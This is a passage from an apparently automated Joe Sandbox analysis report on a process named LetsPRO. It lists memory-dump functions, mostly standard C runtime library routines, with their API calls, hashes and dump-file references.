                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID:
                                        • API String ID: 1114863663-0
                                        • Opcode ID: f29620c99bbb1a9daccaa2674a0f72d915a2250407b3406e32525d33430c385a
                                        • Instruction ID: 6103a20663f3c6e8698b5d7935addf34a5d438a65af8515f92e8580d444e4895
                                        • Opcode Fuzzy Hash: f29620c99bbb1a9daccaa2674a0f72d915a2250407b3406e32525d33430c385a
                                        • Instruction Fuzzy Hash: 2941F3309092D69BEB328F66C4C07A93BB4BF0232DF185799D8B04ADE1E774C645D798
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C960CBC Relevance: 7.6, APIs: 5, Instructions: 111stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • strncmp.MSVCR100(00000000,?,00000000,?,?), ref: 6C960CF9
                                        • _errno.MSVCR100(?,?,?), ref: 6C960D1F
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?), ref: 6C960D2A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100(?,?,?,?), ref: 6C960D4E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6C960D59
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameterstrncmp
                                        • String ID:
                                        • API String ID: 2244377858-0
                                        • Opcode ID: d508629f16a0bdc6b96289f5fac404035a9ab9585c3341b4c2665841e9aea944
                                        • Instruction ID: e1f55ce4abbb6d9fb9148db8dea95566a2ae5a0dedb2c6782fb92f585dd6e8c9
                                        • Opcode Fuzzy Hash: d508629f16a0bdc6b96289f5fac404035a9ab9585c3341b4c2665841e9aea944
                                        • Instruction Fuzzy Hash: 0C4104318043C99BEB129E6AC4903ED7FB4AF0232DF245399D4B05ADE5C734E586C754
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C946BA5 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCR100(000000C0,F3B6147F), ref: 6C946BDA
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 6C946CD4
                                          • Part of subcall function 6C9496F4: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 6C949758
                                          • Part of subcall function 6C9496F4: GetLastError.KERNEL32(?,00000000), ref: 6C949765
                                          • Part of subcall function 6C9496F4: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6C94977D
                                          • Part of subcall function 6C9496F4: _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,00000000), ref: 6C94978B
                                          • Part of subcall function 6C9496F4: GetLastError.KERNEL32(?,00000000), ref: 6C9497B2
                                          • Part of subcall function 6C9496F4: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6C9497CA
                                          • Part of subcall function 6C9496F4: GetLastError.KERNEL32(?,00000000), ref: 6C9497ED
                                          • Part of subcall function 6C9496F4: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6C949805
                                          • Part of subcall function 6C9386CE: _memset.LIBCMT(?,00000000,0000000C,6C93870C), ref: 6C9386D3
                                        • GetLastError.KERNEL32 ref: 6C946C6C
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C946C85
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C946C94
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLast$ExceptionThrow$??2@CreateEventMultipleObjectsWait_memsetmalloc
                                        • String ID:
                                        • API String ID: 2739790103-0
                                        • Opcode ID: 5f558238d1f142b4e89b5fbde1f49656200e70d8f08a1dedfaef257df50c8c76
                                        • Instruction ID: 2d1e007ffd1b67fda1987f2639e2d8979341dff7b430f87697a67114ce96aa5a
                                        • Opcode Fuzzy Hash: 5f558238d1f142b4e89b5fbde1f49656200e70d8f08a1dedfaef257df50c8c76
                                        • Instruction Fuzzy Hash: DB419BB16083019FD710CF64D885B4ABBF8FB99328F104A29F954D7A90DB31E808CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C943DB6 Relevance: 7.6, APIs: 5, Instructions: 100COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • QueryDepthSList.KERNEL32(80000000,-00000001,00000000,?,?,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000), ref: 6C943E34
                                        • InterlockedPushEntrySList.KERNEL32(80000008,-000000C8,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000,?,?,6C936887), ref: 6C943E4B
                                        • QueryDepthSList.KERNEL32(80000008,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000,?,?,6C936887,?), ref: 6C943E52
                                        • InterlockedFlushSList.KERNEL32(80000008,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000,?,?,6C936887,?), ref: 6C943E81
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: List$DepthInterlockedQuery$EntryFlushPush
                                        • String ID:
                                        • API String ID: 4063097673-0
                                        • Opcode ID: 5446267ffa8b8772b18a5ba076352913ee99f2b3af4854b99750b8109b194396
                                        • Instruction ID: baa8ef8b71df773081f7114fa256a60910abf0eb4ea1023afa2c35c380b7bb2d
                                        • Opcode Fuzzy Hash: 5446267ffa8b8772b18a5ba076352913ee99f2b3af4854b99750b8109b194396
                                        • Instruction Fuzzy Hash: 5F31AC76201525AFCB04DF38C984DAA73E8FF4A324B148659EA16DBB00D730F955CBE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90BC34 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(00000001,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C90BC49
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • _malloc_crt.MSVCR100(00000038,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C928FB6
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C928FDE
                                        • free.MSVCR100(021F1FE8), ref: 6C928FF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CountEnterInitializeSpin_lock_malloc_crtfree
                                        • String ID:
                                        • API String ID: 954917037-0
                                        • Opcode ID: a6d2303f3a27015ae53c28d8af5b26b406eb535ca175c7c4084b20e566941eff
                                        • Instruction ID: 0fe27c7cc37d63d20ea207e5ad5bccdd9d26a69be728ddd1489ec61ca3224104
                                        • Opcode Fuzzy Hash: a6d2303f3a27015ae53c28d8af5b26b406eb535ca175c7c4084b20e566941eff
                                        • Instruction Fuzzy Hash: CF318D72708626DFDB10CFAED481A4DB7B4BF59314B22815DE56587A91CB70E449CFC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90E41F Relevance: 7.6, APIs: 5, Instructions: 90COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C90E360: DName::operator+.LIBCMT ref: 6C90E3CC
                                        • DName::operator+.LIBCMT ref: 6C90E482
                                        • DName::operator+.LIBCMT ref: 6C90E489
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+
                                        • String ID:
                                        • API String ID: 2943138195-0
                                        • Opcode ID: f41b297575eb1e95dea53401f809c4491ed7fe429ea914e6cee0fbd90e231cbe
                                        • Instruction ID: 4205f8876dd1f699eedf006b074abe1fff5ca89e3b5ab1602f6e813f8248fc1e
                                        • Opcode Fuzzy Hash: f41b297575eb1e95dea53401f809c4491ed7fe429ea914e6cee0fbd90e231cbe
                                        • Instruction Fuzzy Hash: 0731D5727056089FC710CFA8D8509EABBF9EF69708B04486DE5C6DBB41D730E845CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C937801 Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C937808
                                        • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C93781B
                                          • Part of subcall function 6C93AEF0: __EH_prolog3.LIBCMT ref: 6C93AEF7
                                        • malloc.MSVCR100(00000001,?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C937864
                                        • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C9378B6
                                        • _freea_s.MSVCR100(00000000,?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C9378CF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@H_prolog3H_prolog3_V12@@_freea_smalloc
                                        • String ID:
                                        • API String ID: 911861471-0
                                        • Opcode ID: 071539334767768f5c81b80c9bb210b4370e63d9bc53ff8e9c6519ac784a6144
                                        • Instruction ID: 3f80a9400b68dcabd0ace15786b06faef703e3bf5bfaeecadb9ce8c155af6125
                                        • Opcode Fuzzy Hash: 071539334767768f5c81b80c9bb210b4370e63d9bc53ff8e9c6519ac784a6144
                                        • Instruction Fuzzy Hash: 2E21A071E01231CBDB01CFA9C9C0A9EB7B9FF55718B1110A9DD1AABB50DB30D805CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911D9D Relevance: 7.6, APIs: 5, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock_file.MSVCR100(?,?,?,?,?,?,?,6C911E58,0000000C), ref: 6C911DE7
                                        • __freebuf.LIBCMT ref: 6C911DF8
                                        • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6C911E58,0000000C), ref: 6C911E1E
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C911E58,0000000C), ref: 6C928EDD
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C911E58,0000000C), ref: 6C928EE8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __freebuf_errno_invalid_parameter_noinfo_lock_file_malloc_crt
                                        • String ID:
                                        • API String ID: 1322749186-0
                                        • Opcode ID: 5725b92f6721d138a6f4e59e2a4b12043aa31aac697758396185da0e54b5ef45
                                        • Instruction ID: 723d0b4dd62ffcfecf0930f651abc74bcb242657fc04fb3e7d99d00294685dbc
                                        • Opcode Fuzzy Hash: 5725b92f6721d138a6f4e59e2a4b12043aa31aac697758396185da0e54b5ef45
                                        • Instruction Fuzzy Hash: 30214C31A15706DBE7249F65C4417DE37A4AF23338F20861ED4719AED0DB38D504CB84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9978C9 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • _domain_err.LIBCMT ref: 6C9978F3
                                          • Part of subcall function 6C997521: __ctrlfp.LIBCMT ref: 6C997530
                                          • Part of subcall function 6C997521: __except1.LIBCMT ref: 6C99754D
                                        • _y0.MSVCR100 ref: 6C997921
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __ctrlfp__except1_domain_err
                                        • String ID:
                                        • API String ID: 2310245683-0
                                        • Opcode ID: baf86dc5be904f15b6049b5230a44cc05aaebf1ddd6dbdab1465fa511a48f76b
                                        • Instruction ID: 1bb6352e5f03deee742378bd492f68cda5c31878ac786fad3162f8223fc5a508
                                        • Opcode Fuzzy Hash: baf86dc5be904f15b6049b5230a44cc05aaebf1ddd6dbdab1465fa511a48f76b
                                        • Instruction Fuzzy Hash: AA21D071E0860AEBCF01AF94E8852CD7BB4FB50358F398A88E891605D1EF31C668C795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C978BE8 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileType.KERNEL32(?,?,?,6C978D00,0000000C), ref: 6C978C1C
                                        • GetLastError.KERNEL32(?,?,6C978D00,0000000C), ref: 6C978C26
                                        • __dosmaperr.LIBCMT(00000000,?,?,6C978D00,0000000C), ref: 6C978C2D
                                        • _errno.MSVCR100(?,?,6C978D00,0000000C), ref: 6C978C5D
                                        • __doserrno.MSVCR100(?,?,6C978D00,0000000C), ref: 6C978C68
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastType__doserrno__dosmaperr_errno
                                        • String ID:
                                        • API String ID: 3203400888-0
                                        • Opcode ID: e77b03e0580e645ebf32968f4951e5829b2ec3ee4ffa9b230ba87b2b260bb6ff
                                        • Instruction ID: a79336072521081a7aae2f78cb6062b87141f23e2b922bc3ca3a1ba885defe28
                                        • Opcode Fuzzy Hash: e77b03e0580e645ebf32968f4951e5829b2ec3ee4ffa9b230ba87b2b260bb6ff
                                        • Instruction Fuzzy Hash: A121F171A476449ADB258F64C8017CD7B60AF52328F2C834AD474ABAD2CB75C185DFA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C942F2A Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C942F31
                                        • EnterCriticalSection.KERNEL32(?,00000028,6C93EFDA,00000000,?,00000000), ref: 6C942F3D
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C942F62
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C942FBF
                                        • ??_V@YAXPAX@Z.MSVCR100(?), ref: 6C942FCD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prolog3Leave
                                        • String ID:
                                        • API String ID: 4250467438-0
                                        • Opcode ID: 2a9b1f3944b00994512113242d8dce820ad72df4fe235c36d0b7995e827e0fbe
                                        • Instruction ID: d9bc921f0e9dc1c4eead093af2d37da50759dbac60a87ecc0d70f6f68b9f211a
                                        • Opcode Fuzzy Hash: 2a9b1f3944b00994512113242d8dce820ad72df4fe235c36d0b7995e827e0fbe
                                        • Instruction Fuzzy Hash: 05219370701A069FDB08CF79D588E6ABBB8BF55304B5085ADE512CBA60DB30D960CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95C872 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__mbsrtowcs_helper_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2140840981-0
                                        • Opcode ID: 0b4f4dbbbbbcab3d33805960b6d424df389adf01d4b0da72da8544635c3310dd
                                        • Instruction ID: f32e9453415cafd1b9e60c0fc27a3390d3ca7c4b12bf55ffdb4e8f7dc070886f
                                        • Opcode Fuzzy Hash: 0b4f4dbbbbbcab3d33805960b6d424df389adf01d4b0da72da8544635c3310dd
                                        • Instruction Fuzzy Hash: EC11E231600A5ADBCB21FF28C81069F37B8FF58728FA00A99EE6497A90D731C4308795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910A77 Relevance: 7.6, APIs: 5, Instructions: 62COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6C910A95
                                        • _errno.MSVCR100 ref: 6C92C806
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C811
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                        • String ID:
                                        • API String ID: 1358483507-0
                                        • Opcode ID: 1ea1eba03afc8af613a305b51ed0dcd7258de7c0548fe3120d2657f400604f0d
                                        • Instruction ID: 41bb048f8246db4834d7daebb17f4507beec09aec90d13ff297ebfc6031406a3
                                        • Opcode Fuzzy Hash: 1ea1eba03afc8af613a305b51ed0dcd7258de7c0548fe3120d2657f400604f0d
                                        • Instruction Fuzzy Hash: F3115C31611199DBFF202E95C8443BD36A8EF22719F20859AF8F49AED8DB3DC44087E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910668 Relevance: 7.6, APIs: 5, Instructions: 62COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _fileno.MSVCR100(?,?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C910672
                                        • _isatty.MSVCR100(00000000,?,?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C910678
                                        • __p__iob.MSVCR100(?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C928A7D
                                        • _malloc_crt.MSVCR100(00001000,?,?,?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C928AC1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __p__iob_fileno_isatty_malloc_crt
                                        • String ID:
                                        • API String ID: 301265415-0
                                        • Opcode ID: 682fd3983b12a3d461d26dd981cead2da1a471dee42d54dbd5748bff7ed44b2b
                                        • Instruction ID: 66ed68c66a77a1247a0c82b1cfffe472fd5ce9d82a7dc3cdc4a30e6076463a79
                                        • Opcode Fuzzy Hash: 682fd3983b12a3d461d26dd981cead2da1a471dee42d54dbd5748bff7ed44b2b
                                        • Instruction Fuzzy Hash: 8111A3B25187029ED3248F7AD882687B7F8BF65398B14492FD0D6C3E00EB75E4508B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912584 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • _fileno.MSVCR100(?,6C912620,00000008), ref: 6C9125A8
                                        • _lock_file.MSVCR100(?,?,6C912620,00000008), ref: 6C9125B0
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                          • Part of subcall function 6C90A5D5: _fileno.MSVCR100(?,?,?,?,?,?,?,6C90A870,?), ref: 6C90A604
                                          • Part of subcall function 6C90A5D5: _write.MSVCR100(00000000,?,?,?,?,?,?,6C90A870,?), ref: 6C90A60B
                                        • _lseek.MSVCR100(00000000,00000000,00000000,?,?,6C912620,00000008), ref: 6C9125FD
                                        • _errno.MSVCR100(6C912620,00000008), ref: 6C928EA6
                                        • _invalid_parameter_noinfo.MSVCR100(6C912620,00000008), ref: 6C928EB1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
